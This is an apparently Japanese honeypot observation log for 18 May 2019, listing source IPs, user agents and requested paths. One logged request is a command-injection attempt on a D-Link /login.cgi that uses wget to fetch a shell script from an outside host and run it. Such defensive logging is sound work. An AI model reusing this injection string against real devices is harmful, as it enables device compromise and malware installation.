2019/05/18 ハニーポット(仮) 観測記録
ハニーポット(仮) 観測記録
2019/05/18分です。
件数的には落ち着いた1日でした。
D-Linkの脆弱性を狙うアクセスを確認しました。
UserAgentにAmazon CloudFrontが入っているリクエストを確認しました。
/api/v1/timeのパスへGETしてきています。
総アクセス数:20 (前日比:-1348)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 101.71.37.30 | China |
| 9 | 104.248.146.28 | Singapore |
| 1 | 115.159.153.135 | China |
| 2 | 188.166.108.36 | Netherlands |
| 1 | 218.108.29.194 | China |
| 3 | 3.0.244.68 | Singapore |
| 2 | 77.247.109.202 | Netherlands |
| 1 | 93.78.215.39 | Ukraine |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 8 | - |
| 6 | Amazon CloudFront |
| 1 | Hakai/2.0 |
| 2 | Java/1.8.0_212 |
| 2 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1) |
| 1 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | CONNECT | antei.xyz:443 | HTTP/1.1 |
| 2 | GET | /api | HTTP/1.1 |
| 9 | GET | /api/v1/time | HTTP/1.1 |
| 1 | GET | /.git/HEAD | HTTP/1.1 |
| 1 | GET | /login.cgi?cli=aa%20aa%27;wget%20http://194[.]147[.]32[.]131/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ | HTTP/1.1 |
| 2 | GET | /LoginPage.do | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | HEAD | /robots.txt | HTTP/1.1 |
